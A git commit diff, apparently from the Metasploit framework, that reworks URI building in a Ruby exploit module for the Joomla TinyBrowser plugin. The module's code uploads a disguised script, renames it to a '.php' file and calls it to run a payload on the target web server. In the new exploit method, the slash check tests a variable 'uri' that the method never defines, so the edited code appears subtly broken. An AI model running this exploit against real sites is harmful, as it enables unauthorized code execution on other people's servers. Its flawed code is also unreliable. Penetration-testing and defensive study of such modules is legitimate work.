clean up extra slashes in uris

git-svn-id: file:///home/svn/framework3/trunk@9036 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/unix/webapp/joomla_tinybrowser.rb

@@ -57,9 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
+		uri = ''
+		uri << datastore['URI']
+		uri << '/' if uri[-1,1] != '/'
+		uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
 		res = send_request_raw(
 			{
-				'uri' => datastore['URI'] + '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
+				'uri' => uri
 			}, 25)
 
 		if (res and res.body =~ /flexupload.swf/)
@@ -81,17 +85,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Generate some random strings
 		cmdscript	= rand_text_alpha_lower(20)
-		boundary = rand_text_alphanumeric(6)
+		boundary    = rand_text_alphanumeric(6)
 
 		# Static files
 		directory 	= '/images/stories/'
-		tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'
-		cmdpath 	= directory + cmdscript
+		uri_base    = ''
+		uri_base << datastore['URI']
+		uri_base << '/' if uri[-1,1] != '/'
+		uri_base << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'
 
 		# Get obfuscation code (needed to upload files)
 		obfuscation_code = nil
+
 		res = send_request_raw({
-			'uri'     => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
+			'uri'     => uri_base + '/upload.php?type=file&folder='
 		}, 25)
 
 		if (res)
@@ -116,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << "\r\n--#{boundary}--"
 
 		res = send_request_raw({
-			'uri'	  => datastore['URI'] + tinybrowserpath + "/upload_file.php?folder=/images/stories/&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
+			'uri'	  => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>
@@ -136,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Complete the upload process (rename file)
 		print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
 		res = send_request_raw({
-			'uri'     => datastore['URI'] + tinybrowserpath + 'upload_process.php?folder=/images/stories/&type=file&feid=&filetotal=1'
+			'uri'     => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
 		})
 
 
@@ -144,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi(
 			{
 				'method'    => 'POST',
-				'uri'       => datastore['URI'] + tinybrowserpath + '/edit.php?type=file&folder=',
+				'uri'       => uri_base + '/edit.php?type=file&folder=',
 				'vars_post' =>
 				{
 					'actionfile[0]' => "#{cmdscript}.ph.p",
@@ -167,8 +174,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Finally call the payload
 		print_status("Calling payload: #{cmdscript}.php")
+		uri = ''
+		uri << datastore['URI']
+		uri << '/' if uri[-1,1] != '/'
+		uri << directory + cmdscript + ".php"
 		res = send_request_raw({
-			'uri'	=> "#{datastore['URI'] }images/stories/#{cmdscript}.php"
+			'uri'	=> uri
 		}, 25)
 
 	end